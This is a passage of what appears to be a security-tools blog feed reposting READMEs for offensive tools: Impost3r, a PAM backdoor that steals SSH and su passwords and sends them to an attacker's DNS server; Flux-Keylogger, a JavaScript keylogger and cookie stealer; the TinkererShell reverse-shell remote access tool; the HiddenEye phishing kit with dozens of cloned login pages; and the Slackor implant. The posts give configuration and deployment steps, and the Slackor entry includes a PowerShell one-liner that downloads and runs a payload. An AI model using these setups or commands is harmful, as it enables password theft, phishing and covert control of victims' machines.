First, assume that the attacker controls a server,and gets the root privilege<br />
</li>
<li>
Then edit the <code>/ssh_su/main.c</code> source code file of Impost3r<br />
</li>
</ul>
<pre><code>/*
Custom setting
*/
# define SSH_OR_BOTH 0 \\Set stealing mode, 0 means only steal ssh password, 1 means steal ssh and su password, the default is 0 (the difference will be mentioned later)
# define SAVE_OR_SEND 0 \\Set the method you want to apply when Impost3r get the password,(send to your server=0,save the result on the current server=1,default is send)
/*
Send to server
*/
# define MAX_RESEND 30 \\Set the maximum times that Impost3r will try to resends stealing result to attacker's server(This option is valid only when SSH_OR_BOTH is 0)
# define RESEND_INTERVAL 5 \\Set the interval of resending stealing result.(This option is valid only when SSH_OR_BOTH is 0)
# define REMOTE_ADDRESS "192.168.0.12" \\Set the malicious server ip address that you want to receive stealing result
# define REMOTE_PORT 53 \\Set the malicious server port
/*
Save to local
*/
# define SAVE_LOCATION "/tmp/.sshsucache" \\Set the result file location if you want to save the result on the server
</code></pre>
<ul>
<li>
After the modification is completed, save and execute ```make''` in the current directory<br />
</li>
<li>
Get the compiled file impost3r.so<br />
</li>
<li>
Upload the compiled impost3r.so to the target server under <code>/lib/x86_64-linux-gnu/security</code> folder.(Different machines may have different folder names)<br />
</li>
<li>
Enter <code>/etc/pam.d</code>, and then there are two cases. If the selected mode is to steal only the ssh password, then you need to execute <code>vi sshd</code> and add at the following statement at the end of the file.<br />
</li>
</ul>
<pre><code>auth optional impost3r.so
account optional impost3r.so
</code></pre>
<ul>
<li>
Save and exit, restart the sshd service <code>service sshd restart</code><br />
</li>
<li>
But if you choose to steal the ssh and su passwords together, you need to execute <code>vi common-auth</code>, add the same statement, save and exit and restart the sshd service<br />
</li>
<li>
Attacker starts the dns server program on his server, waiting for a legitimate user to log on the target server via <code>ssh</code> or use <code>su</code> to switch users to get the passwords.<br />
</li>
</ul>
<h3>
Demo</h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-uWFLAwptYq0/Xt3H3MDPYfI/AAAAAAAASso/bKjg79mlgVowASowvYRg5l9oblt3pqDCQCNcBGAsYHQ/s1600/Impost3r_7.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="819" data-original-width="1374" height="380" src="https://1.bp.blogspot.com/-uWFLAwptYq0/Xt3H3MDPYfI/AAAAAAAASso/bKjg79mlgVowASowvYRg5l9oblt3pqDCQCNcBGAsYHQ/s640/Impost3r_7.gif" width="640" /></a></div>
<br />
<h3>
Tips</h3>
<ul>
<li>
In the case of stealing the ssh/su password, Impost3r cannot clear
the traces due to permission reasons, so the attacker needs to clear
them himself<br />
</li>
<li>
Please note that if you set to steal only ssh passwords, you can be
guaranteed that you will receive the stolen results nearly 100 percent,
but if you set to steal both, you will not be guaranteed that you will
receive the results
100 percent. (Choose to save result locally won't have this problem,Only
dns will)<br />
</li>
<li>
It is not recommended to steal the su password since the user's ssh
password is the same as the su password.It's pretty enough to have ssh
password i think.<br />
</li>
</ul>
<h2>
Attention</h2>
<ul>
<li>The Dns server progran I use is <a href="https://github.com/deepdarkness/Fdns">Fdns</a>,and I change some params,you can find the changed source code under the <code>Fdns</code> folder,and use <code>gcc -o dns main.c util.c</code>
to compile it by yourself.And actually you can use any kinds of dns
server,but the dns server you use must can make a dns response to client
instead of just recording dns request(You also need recording dns
request,or you will lose the stealing result).</li>
<li>This porject is coding just for fun , the logic structure and code
structure are not strict enough, please don't be so serious about it,and
also welcome suggestions and prs.</li>
</ul>
<h2>
Thanks</h2>
<ul>
<li><a href="https://github.com/deepdarkness/Fdns">Fdns</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ph4ntonn/Impost3r" rel="nofollow" target="_blank" title="Download Impost3r">Download Impost3r</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-354426584218240552020-04-19T17:14:00.002-04:002020-04-19T17:14:47.363-04:00Flux-Keylogger - Modern Javascript Keylogger With Web Panel<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-b2K6QvrWNgo/Xpy_G-iAjdI/AAAAAAAASRI/9NqroEcxz3sItxjtuj-1iLhaX3G0xPX8QCNcBGAsYHQ/s1600/Flux-Keylogger_1_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="306" data-original-width="818" height="238" src="https://1.bp.blogspot.com/-b2K6QvrWNgo/Xpy_G-iAjdI/AAAAAAAASRI/9NqroEcxz3sItxjtuj-1iLhaX3G0xPX8QCNcBGAsYHQ/s640/Flux-Keylogger_1_logo.png" width="640" /></a></div>
<br />
<blockquote>
Modern javascript <a href="https://www.kitploit.com/search/label/Keylogger" target="_blank" title="keylogger">keylogger</a> with web panel</blockquote>
<div align="center">
</div>
<br />
<span style="font-size: large;"><b>Web panel:</b></span><br />
<div align="center">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-JW3P9JLfhEg/Xpy_ML70wYI/AAAAAAAASRM/sF-61I4s2rweupnmWiU-vXqOy2_xvpL7ACNcBGAsYHQ/s1600/Flux-Keylogger_2_panel.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="900" data-original-width="1600" height="360" src="https://1.bp.blogspot.com/-JW3P9JLfhEg/Xpy_ML70wYI/AAAAAAAASRM/sF-61I4s2rweupnmWiU-vXqOy2_xvpL7ACNcBGAsYHQ/s640/Flux-Keylogger_2_panel.png" width="640" /></a></div>
<div align="center">
<br /></div>
<b style="font-size: x-large;">Logging:</b><br />
<ul>
<li>Keylogger</li>
<li>Cookies</li>
<li>Location</li>
<li>Remote IP</li>
<li>User-Agents</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation server files:</b></span><br />
<ul>
<li>Upload files from <code>server</code> directory to you server</li>
<li>Change default username, password in flux.php</li>
<li>Go to <a href="http://you.host/flux.php" rel="nofollow" target="_blank" title="http://you.host/flux.php">http://you.host/flux.php</a></li>
<li>Click build</li>
<li>Now inject script tag to other documents</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/LimerBoy/Flux-Keylogger" rel="nofollow" target="_blank" title="Download Flux-Keylogger">Download Flux-Keylogger</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-84656145524086997862019-09-14T17:41:00.000-03:002019-09-14T17:41:00.914-03:00TinkererShell - A Simple Python Reverse Shell Written Just For FunA simple reverse shell written in python 3.7 just for fun. Actually it supports <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> and Linux OS and integrates some basic features like keylogging and AES encrypted communications.<br />
<br />
<span style="font-size: large;"><b>Supported operating systems:</b></span><br />
<ul class="contains-task-list">
<li class="task-list-item">Windows</li>
<li class="task-list-item">Linux</li>
<li class="task-list-item">OSX</li>
</ul>
<a name='more'></a><br />
<span style="font-size: large;"><b>Functions and characteristics:</b></span><br />
<ul class="contains-task-list">
<li class="task-list-item"><a href="https://www.kitploit.com/search/label/Reverse" target="_blank" title="Reverse">Reverse</a> connection.</li>
<li class="task-list-item">AES encrypted communications.</li>
<li class="task-list-item">Multithreaded.</li>
<li class="task-list-item">Support multiple bots connected at the same time.</li>
<li class="task-list-item">Keylogger.</li>
<li class="task-list-item">Possibility to take screenshots of bot's monitors.</li>
<li class="task-list-item">Possibility to take pictures using bot's webcam.</li>
<li class="task-list-item">Possibility to steal bot's clipboard's content.</li>
<li class="task-list-item">Possibility to enable or disable persistence (before <a href="https://www.kitploit.com/search/label/Payload" target="_blank" title="payload">payload</a> delivery or later via remote control).</li>
<li class="task-list-item">Possibility to enable or disable <a href="https://www.kitploit.com/search/label/Keylogger" target="_blank" title="keylogger">keylogger</a> (before payload delivery or later via remote control).</li>
<li class="task-list-item">Simple DNS <a href="https://www.kitploit.com/search/label/Spoofer" target="_blank" title="spoofer">spoofer</a> (via hosts file).</li>
<li class="task-list-item">Capability to upload and download files to and from the bot.</li>
</ul>
<blockquote>
Work in progress... stay tuned!</blockquote>
<br />
<b>TODO:</b><br />
<ul>
<li>Thoroughly test persistence function on Linux.</li>
<li>Thoroughly test persistence function on Windows.</li>
<li>Add webcam stream and microphone recording (ideally streaming from bot and saving locally to master).</li>
</ul>
<strong><em>This project is for educational purposes only. Don't use it for illegal activities. I don't support nor condone illegal or unethical actions and I can't be held responsible for possible misuse of this software.</em></strong><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/4n4nk3/TinkererShell" rel="nofollow" target="_blank" title="Download TinkererShell">Download TinkererShell</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-49622323876591166872019-07-22T09:10:00.000-04:002019-07-22T09:10:13.419-04:00HiddenEye - Modern Phishing Tool With Advanced Functionality (Android-Support-Available)<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-jNjrHagkyaw/XTHyJ_ZUSJI/AAAAAAAAPoA/uE5Si2T7_SA6eU-gieIf6PSZrN4dl7r9gCLcBGAs/s1600/HiddenEye_2_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="509" data-original-width="1312" height="246" src="https://1.bp.blogspot.com/-jNjrHagkyaw/XTHyJ_ZUSJI/AAAAAAAAPoA/uE5Si2T7_SA6eU-gieIf6PSZrN4dl7r9gCLcBGAs/s640/HiddenEye_2_logo.png" width="640" /></a></div>
<div align="center">
<br /></div>
<div align="center">
Modern Phishing Tool With Advanced Functionality </div>
<div align="center">
<br /></div>
<div align="center">
PHISHING | KEYLOGGER | INFORMATION_COLLECTOR | ALL_IN_ONE_TOOL | SOCIALENGINEERING</div>
<a name='more'></a><br />
<span style="font-size: x-large;"><b>DEVELOPERS & CONTRIBUTORS</b></span><br />
<ol>
<li>ANONUD4Y (<a href="https://github.com/An0nUD4Y" rel="nofollow" target="_blank" title="https://github.com/An0nUD4Y">https://github.com/An0nUD4Y</a>)</li>
<li>USAMA ABDUL SATTAR (<a href="https://github.com/usama7628674" rel="nofollow" target="_blank" title="https://github.com/usama7628674">https://github.com/usama7628674</a>)</li>
<li>sTiKyt (<a href="https://github.com/sTiKyt" rel="nofollow" target="_blank" title="https://github.com/sTiKyt">https://github.com/sTiKyt</a>)</li>
<li>UNDEADSEC (<a href="https://github.com/UndeadSec" rel="nofollow" target="_blank" title="https://github.com/UndeadSec">https://github.com/UndeadSec</a>)</li>
<li>Micrafast (<a href="https://github.com/Micrafast" rel="nofollow" target="_blank" title="https://github.com/Micrafast">https://github.com/Micrafast</a>)</li>
<li>___________ (WAITING FOR YOU)</li>
</ol>
<br />
<span style="font-size: x-large;"><b>SCREENSHOT (Android-Userland)</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-sODkn89pRQw/XTHyU4g2kVI/AAAAAAAAPoE/3T-Jp-rJGzUXEUaftMwxkVnmZ-jRqHcAwCLcBGAs/s1600/HiddenEye_5_Screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1440" height="320" src="https://1.bp.blogspot.com/-sODkn89pRQw/XTHyU4g2kVI/AAAAAAAAPoE/3T-Jp-rJGzUXEUaftMwxkVnmZ-jRqHcAwCLcBGAs/s640/HiddenEye_5_Screenshot.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-size: large;"><b>CREDIT:-</b></span><br />
<ul>
<li>Anonud4y ( I don't remember if i have done Anything )</li>
<li>Usama ( A Most active Developer)</li>
<li>sTiKyt ( Guy Who recustomized everything )</li>
<li>UNDEADSEC (For His wonderful repo socialfish which motivated us a lot)</li>
<li>TheLinuxChoice ( For His Tools Phishing Pages )</li>
</ul>
<br />
<b>TESTED ON FOLLOWING:-</b><br />
<ul>
<li><strong>Kali Linux - Rolling Edition</strong></li>
<li><strong>Parrot OS - Rolling Edition</strong></li>
<li><strong>Linux Mint - 18.3 Sylvia</strong></li>
<li><strong>Ubuntu - 16.04.3 LTS</strong></li>
<li><strong>MacOS High Sierra</strong></li>
<li><strong>Arch Linux</strong></li>
<li><strong>Manjaro XFCE Edition 17.1.12</strong></li>
<li><strong>Black Arch</strong></li>
<li><strong>Userland app (For Android Users)</strong></li>
</ul>
<br />
<b>PREREQUISITES ( Please verify if you have installed )</b><br />
<ul>
<li>Python 3</li>
<li>Wget from Python</li>
<li>PHP</li>
<li>sudo</li>
</ul>
<br />
<span style="font-size: x-large;"><b>FOUND A BUG ? / HAVE ANY ISSUE ? :- (Read This)</b></span><br />
<ul>
<li>Check closed & solved issues/bugs before opening new.</li>
<li>Make sure your issue is related to the codes and resources of this repository.</li>
<li>Its your responsibility to response on your opened issues.</li>
<li>If we don't found user response on his/her issue in the particular time interval , Then we have to close that issue.</li>
<li>Do Not Spam or Advertise & Respect Everyone.</li>
</ul>
<br />
<b>WHAT'S NEW FEATURES</b><br />
<strong>1) LIVE ATTACK</strong><br />
<ul>
<li>Now you will have live information about the victims such as : IP ADDRESS, Geolocation, ISP, Country, & many more.</li>
</ul>
<strong>2) COMPATIBILITY</strong><br />
<ul>
<li>All the sites are mobile compatible.</li>
</ul>
<strong>3) KEYLOGGER</strong><br />
<ul>
<li>Now you will also have the ability to capture all the keystokes of victim.</li>
<li>You can now Deploy Keyloggers With (Y/N) option.</li>
<li>Major issues fixed.</li>
</ul>
<strong>4) ANDROID SUPPORT</strong><br />
<ul>
<li>We care about Android Users, So now we have came with two ways to run HiddenEye in Android Devices.</li>
</ul>
<strong>(A) UserLand App</strong><br />
<ul>
<li>You Have to Download UserLand App. <a href="https://play.google.com/store/apps/details?id=tech.ula" rel="nofollow" target="_blank" title="Click Here">Click Here</a> To Download it.</li>
<li>To read more how to set up userland app Read <a href="https://null-byte.wonderhowto.com/how-to/android-for-hackers-turn-android-phone-into-hacking-device-without-root-0189649/" rel="nofollow" target="_blank" title="HERE">HERE</a></li>
</ul>
<strong>(B) Termux App</strong><br />
<ul>
<li>You Have to Download Termux App. <a href="https://play.google.com/store/apps/details?id=com.termux" rel="nofollow" target="_blank" title="Click Here">Click Here</a> To Download it.</li>
<li>For Further instruction <a href="https://github.com/DarkSecDevelopers/HiddenEye/blob/master/instructions.md" rel="nofollow" target="_blank" title="Check Instructions">Check Instructions</a></li>
<li>Termux Users Clone With This Command , Unless Errors may occur during Running.</li>
</ul>
<pre><code>git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git
</code></pre>
<strong>5) NEW LOOK PROVIDED</strong><br />
<ul>
<li>NOW FOCUS EASILY ON TASKS...</li>
<li>CUSTOMIZE APP WITH YOUR OWN THEMES</li>
</ul>
<strong>6) SERVEO URL TYPE SELECTION AVAILABLE NOW</strong><br />
<ul>
<li>Major issues with serveo is fixed.</li>
<li>Now You can choose out of CUSTOM URL and RANDOM URL.</li>
</ul>
<strong>7) LARGE COLLECTION OF PHISHING PAGES ADDED</strong><br />
<ul>
<li>Pages are taken from various tool including ShellPhish , Blackeye , <a href="https://www.kitploit.com/search/label/SocialFish" target="_blank" title="SocialFish">SocialFish</a> .</li>
</ul>
<br />
<span style="font-size: large;"><b>FOR FURTHER INSTALLATION PROCEDURE - <a href="https://github.com/DarkSecDevelopers/HiddenEye/blob/master/instructions.md" rel="nofollow" target="_blank" title="(CHECK INSTRUCTIONS)">(CHECK INSTRUCTIONS)</a></b></span><br />
<br />
<span style="font-size: large;"><b>AVAILABLE PAGES</b></span><br />
<strong>1) Facebook:</strong><br />
<ul>
<li>Traditional Facebook login page.</li>
<li>Advanced Poll Method.</li>
<li>Fake Security login with Facebook Page.</li>
<li>Facebook messenger login page.</li>
</ul>
<strong>2) Google:</strong><br />
<ul>
<li>Traditional Google login page.</li>
<li>Advanced Poll Method.</li>
<li>New Google Page.</li>
</ul>
<strong>3) LinkedIn:</strong><br />
<ul>
<li>Traditional LinkedIn login page.</li>
</ul>
<strong>4) Github:</strong><br />
<ul>
<li>Traditional Github login page.</li>
</ul>
<strong>5) Stackoverflow:</strong><br />
<ul>
<li>Traditional Stackoverflow login page.</li>
</ul>
<strong>6) Wordpress:</strong><br />
<ul>
<li>Similar Wordpress login page.</li>
</ul>
<strong>7) Twitter:</strong><br />
<ul>
<li>Traditional Twitter login page.</li>
</ul>
<strong>8) Instagram:</strong><br />
<ul>
<li>Traditional <a href="https://www.kitploit.com/search/label/Instagram" target="_blank" title="Instagram">Instagram</a> login page.</li>
<li>Instagram Autoliker Phishing Page.</li>
<li>Instagram Profile Scenario Advanced attack.</li>
<li>Instagram Badge Verify Attack <em>[New]</em></li>
<li>Instagram AutoFollower Phishing Page by (<a href="https://github.com/thelinuxchoice" rel="nofollow" target="_blank" title="https://github.com/thelinuxchoice">https://github.com/thelinuxchoice</a>)</li>
</ul>
<strong>9) SNAPCHAT PHISHING:</strong><br />
<ul>
<li>Traditional Snapchat Login Page</li>
</ul>
<strong>10) YAHOO PHISHING:</strong><br />
<ul>
<li>Traditional Yahoo Login Page</li>
</ul>
<strong>11) TWITCH PHISHING:</strong><br />
<ul>
<li>Traditional Twitch Login Page [ Login With Facebook Also Available ]</li>
</ul>
<strong>12) MICROSOFT PHISHING:</strong><br />
<ul>
<li>Traditional Microsoft-Live Web Login Page</li>
</ul>
<strong>13) STEAM PHISHING:</strong><br />
<ul>
<li>Traditional Steam Web Login Page</li>
</ul>
<strong>14) VK PHISHING:</strong><br />
<ul>
<li>Traditional VK Web Login Page</li>
<li>Advanced Poll Method</li>
</ul>
<strong>15) ICLOUD PHISHING:</strong><br />
<ul>
<li>Traditional iCloud Web Login Page</li>
</ul>
<strong>16) GitLab PHISHING:</strong><br />
<ul>
<li>Traditional GitLab Login Page</li>
</ul>
<strong>17) NetFlix PHISHING:</strong><br />
<ul>
<li>Traditional Netflix Login Page</li>
</ul>
<strong>18) Origin PHISHING:</strong><br />
<ul>
<li>Traditional Origin Login Page</li>
</ul>
<strong>19) Pinterest PHISHING:</strong><br />
<ul>
<li>Traditional Pinterest Login Page</li>
</ul>
<strong>20) Protonmail PHISHING:</strong><br />
<ul>
<li>Traditional Protonmail Login Page</li>
</ul>
<strong>21) Spotify PHISHING:</strong><br />
<ul>
<li>Traditional Spotify Login Page</li>
</ul>
<strong>22) Quora PHISHING:</strong><br />
<ul>
<li>Traditional Quora Login Page</li>
</ul>
<strong>23) PornHub PHISHING:</strong><br />
<ul>
<li>Traditional PornHub Login Page</li>
</ul>
<strong>24) Adobe PHISHING:</strong><br />
<ul>
<li>Traditional Adobe Login Page</li>
</ul>
<strong>25) Badoo PHISHING:</strong><br />
<ul>
<li>Traditional Badoo Login Page</li>
</ul>
<strong>26) CryptoCurrency PHISHING:</strong><br />
<ul>
<li>Traditional CryptoCurrency Login Page</li>
</ul>
<strong>27) DevianArt PHISHING:</strong><br />
<ul>
<li>Traditional DevianArt Login Page</li>
</ul>
<strong>28) DropBox PHISHING:</strong><br />
<ul>
<li>Traditional DropBox Login Page</li>
</ul>
<strong>29) eBay PHISHING:</strong><br />
<ul>
<li>Traditional eBay Login Page</li>
</ul>
<strong>30) MySpace PHISHING:</strong><br />
<ul>
<li>Traditional Myspace Login Page</li>
</ul>
<strong>31) PayPal PHISHING:</strong><br />
<ul>
<li>Traditional PayPal Login Page</li>
</ul>
<strong>32) Shopify PHISHING:</strong><br />
<ul>
<li>Traditional Shopify Login Page</li>
</ul>
<strong>33) Verizon PHISHING:</strong><br />
<ul>
<li>Traditional Verizon Login Page</li>
</ul>
<strong>34) Yandex PHISHING:</strong><br />
<ul>
<li>Traditional Yandex Login Page</li>
</ul>
<br />
<b>Ascii error fix</b><br />
<code>dpkg-reconfigure locales</code><br />
<code>Then select: "All locales" Then select "en_US.UTF-8"</code><br />
<code>After that reboot your machine. Then open terminal and run the command: "locale"</code><br />
<code>There you will see "en_US.UTF-8" which is the default language. Instead of POSIX.</code><br />
<br />
<span style="font-size: large;"><b>DISCLAIMER</b></span><br />
<div align="center">
TO BE USED FOR EDUCATIONAL PURPOSES ONLY </div>
The use of the HiddenEye is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read <a href="https://github.com/DarkSecDevelopers/HiddenEye/blob/master/LICENSE" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a>.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/DarkSecDevelopers/HiddenEye" rel="nofollow" target="_blank" title="Download HiddenEye">Download HiddenEye</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-25494398822502335532019-07-04T09:30:00.000-04:002019-07-04T09:30:04.722-04:00Slackor - A Golang Implant That Uses Slack As A Command And Control ServerA Golang implant that uses Slack as a command and control channel.<br />
This project was inspired by <a href="https://github.com/byt3bl33d3r/gcat" rel="nofollow" target="_blank" title="Gcat">Gcat</a> and <a href="https://github.com/PaulSec/twittor" rel="nofollow" target="_blank" title="Twittor">Twittor</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-taB1C6-xgUU/XRqRfzYjeRI/AAAAAAAAPfg/J_AP0-WmvbIMPYZLi6w403hVHld0ULnxwCLcBGAs/s1600/Slackor_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="642" data-original-width="602" height="640" src="https://1.bp.blogspot.com/-taB1C6-xgUU/XRqRfzYjeRI/AAAAAAAAPfg/J_AP0-WmvbIMPYZLi6w403hVHld0ULnxwCLcBGAs/s640/Slackor_1.png" width="600" /></a></div>
<br />
<a name='more'></a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ij1bpUyGyDI/XRqRgFlCGrI/AAAAAAAAPfk/DPEebDyZIGAk22x9tuLXs44YSyW4T-PFACLcBGAs/s1600/Slackor_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="349" data-original-width="1024" height="218" src="https://1.bp.blogspot.com/-ij1bpUyGyDI/XRqRgFlCGrI/AAAAAAAAPfk/DPEebDyZIGAk22x9tuLXs44YSyW4T-PFACLcBGAs/s640/Slackor_2.png" width="640" /></a></div>
<br />
<br />
<br />
This tool is released as a proof of concept. Be sure to read and understand the <a href="https://api.slack.com/developer-policy" rel="nofollow" target="_blank" title="Slack App Developer Policy">Slack App Developer Policy</a> before creating any Slack apps.<br />
<br />
<span style="font-size: x-large;"><b>Setup</b></span><br />
<strong>Note: The server is written in Python 3</strong><br />
For this to work you need:<br />
<ul>
<li> A Slack Workspace<br />
</li>
<li> <a href="https://api.slack.com/apps" rel="nofollow" target="_blank" title="Register an app">Register an app</a> with the following permissions:<br />
<ul>
<li><strong>channels:read</strong></li>
<li><strong>channels:history</strong></li>
<li><strong>channels:write</strong></li>
<li><strong>files:write:user</strong></li>
<li><strong>files:read</strong></li>
</ul>
</li>
<li> Create a bot<br />
</li>
</ul>
This repo contains five files:<br />
<ul>
<li><code>install.sh</code> Installs dependancies</li>
<li><code>setup.py</code> The script to create the slack channels, database, and implant</li>
<li><code>server.py</code> The Slackor server, designed to be ran on Linux</li>
<li><code>template.go</code> Template for the generated implant</li>
<li><code>requirements.txt</code> Python dependencies (installed automatically)</li>
</ul>
To get started:<br />
<ul>
<li>Run <code>install.sh</code></li>
<li>Run <code>setup.py</code> <ul>
<li>Supply the <em>OAuth Access Token</em> and <em>Bot User OAuth Access Token</em> from your app</li>
</ul>
</li>
</ul>
After running the script successfully, a file <code>agent.exe</code> will be created. It will be a 64bit Go binary packed with UPX.<br />
After starting server.py on a Linux host, execute <code>agent.exe</code> on your target Windows host.<br />
Run the "stager" module to generate a one-liner and other droppers.<br />
<pre><code>powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe</code></pre>
This will execute InvokeWebRequest(PS v.3+) to download the payload, execute it using a <a href="https://lolbas-project.github.io/lolbas/Binaries/Forfiles/" rel="nofollow" target="_blank" title="LOLBin">LOLBin</a>, and then delete itself once killed. This is a working example but the command can tweaked to use another download method or execution method.<br />
<br />
<span style="font-size: x-large;"><b>Usage</b></span><br />
Type "help" or press [TAB] to see a list of available commands. type "help [COMMAND]" to see a description of that command.<br />
<code>(Slackor)</code><br />
<ul>
<li><strong>Help</strong> - Displays help menu</li>
<li><strong>interact</strong> - Interact with an agent</li>
<li><strong>list</strong> - List all registered agents</li>
<li><strong>remove</strong> - kill and remove an agent</li>
<li><strong>revive</strong> - Sends a signal to all agents to re-register with the server</li>
<li><strong>stager</strong> - Generates a one-liner to download an execute the implant</li>
<li><strong>quit</strong> - Quit the program</li>
<li><strong>wipefiles</strong> - Deletes all uploaded files out of Slack</li>
</ul>
Once an agent checks in, you can interact with it. Use "interact [AGENT] to enter into an agent prompt. Type "help" or press [TAB] to see a list of available commands.<br />
<code>(Slackor:AGENT)</code><br />
<ul>
<li><strong>back</strong> - Return to the main menu</li>
<li><strong>beacon</strong> - change the amount of time between each check-in by an agent (default is 5 seconds)</li>
<li><strong>bypassuac</strong> - Attempts to spawn a high integrity agent</li>
<li><strong>cleanup</strong> - Removes persistence artifacts</li>
<li><strong>clipboard</strong> - Retreives the contents of the clipboard</li>
<li><strong>defanger</strong> - Attempts to de-fang Windows Defender</li>
<li><strong>download</strong> - Download a file from the agent to the Slackor server</li>
<li><strong>duplicate</strong> - Causes the agent to spawn another invocation of itself</li>
<li><strong>getsystem</strong> - Spawns an agent as NTAUTHORITY/SYSTEM</li>
<li><strong>help</strong> - Displays help menu</li>
<li><strong>keyscan</strong> - Starts a keylogger on the agent</li>
<li><strong>kill</strong> - Kill the agent</li>
<li><strong>minidump</strong> - Dumps memory from lsass.exe and downloads it</li>
<li><strong>persist</strong> - Creates persistence by implanting a binary in an ADS</li>
<li><strong>samdump</strong> - Attempts to dump the SAM file for offline hash extraction</li>
<li><strong>screenshot</strong> - Takes a screenshot of the desktop and retrieves it</li>
<li><strong>shellcode</strong> - Executes x64 raw shellcode</li>
<li><strong>sleep</strong> - Cause the agent to sleep once (enter time in seconds)</li>
<li><strong>sysinfo</strong> - Displays the current user, OS version, system architecture, and number of CPU cores</li>
<li><strong>upload</strong> - Upload a file to the agent from the Slackor server</li>
<li><strong>wget</strong> - Pull down arbitrary files over HTTP/HTTPS</li>
</ul>
<br />
<span style="font-size: large;"><b>OPSEC Considerations</b></span><br />
Command output and downloaded files are AES encrypted in addition to TLS transport encryption.<br />
Modules will warn you before performing tasks that write to disk.<br />
When executing shell commands, take note that cmd.exe will be executed. This may be monitored on the host. Here are several OPSEC safe commands that will NOT execute cmd.exe:<br />
<ul>
<li><strong>cat</strong> - prints file content</li>
<li><strong>cd</strong> - change directory</li>
<li><strong>hostname</strong> - Displays the name of the host</li>
<li><strong>ifconfig</strong> - Displays interface information</li>
<li><strong>ls</strong> - list directory contents</li>
<li><strong>mkdir</strong> - Creates a directory</li>
<li><strong>pwd</strong> - prints the current working directory</li>
<li><strong>rm</strong> - removes a file</li>
<li><strong>rmdir</strong> - removes a directory</li>
<li><strong>whoami / getuid</strong> - prints the current user</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Credits</b></span><br />
<ul>
<li><a href="https://github.com/EgeBalci" rel="nofollow" target="_blank" title="https://github.com/EgeBalci">https://github.com/EgeBalci</a> - Functions adapted from <a href="https://github.com/EgeBalci/HERCULES" rel="nofollow" target="_blank" title="HERCULES">HERCULES</a> and <a href="https://github.com/EgeBalci/EGESPLOIT" rel="nofollow" target="_blank" title="EGESPLOIT">EGESPLOIT</a></li>
<li><a href="https://github.com/SaturnsVoid" rel="nofollow" target="_blank" title="https://github.com/SaturnsVoid">https://github.com/SaturnsVoid</a> - <a href="https://www.kitploit.com/search/label/Keylogger" target="_blank" title="Keylogger">Keylogger</a> adapted from <a href="https://github.com/SaturnsVoid/GoBot2" rel="nofollow" target="_blank" title="GoBot2">GoBot2</a></li>
<li><a href="https://github.com/vyrus001" rel="nofollow" target="_blank" title="https://github.com/vyrus001">https://github.com/vyrus001</a> - x64 shellcode execution <a href="https://github.com/vyrus001/shellGo" rel="nofollow" target="_blank" title="shellGo">shellGo</a></li>
<li>Crypto functions adopted from <a href="https://www.golang123.com/topic/1686" rel="nofollow" target="_blank" title="https://www.golang123.com/topic/1686">https://www.golang123.com/topic/1686</a></li>
<li>Persistence idea from <a href="https://enigma0x3.net/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/" rel="nofollow" target="_blank" title="Enigma0x3">Enigma0x3</a></li>
<li>Minidump adoped from <a href="https://github.com/Ne0nd0g/merlin" rel="nofollow" target="_blank" title="Merlin">Merlin</a>, credit to <a href="https://github.com/C-Sto" rel="nofollow" target="_blank" title="C-Sto">C-Sto</a></li>
<li>Screenshot code from <a href="https://github.com/kbinani/screenshot" rel="nofollow" target="_blank" title="kbinani">kbinani</a></li>
<li>Clipboard code from <a href="https://github.com/atotto/clipboard" rel="nofollow" target="_blank" title="atotto">atotto</a></li>
<li>Stager generator from <a href="https://github.com/hlldz/SpookFlare" rel="nofollow" target="_blank" title="hlldz">hlldz</a></li>
<li>UAC bypass by <a href="https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/" rel="nofollow" target="_blank" title="winscripting.blog">winscripting.blog</a></li>
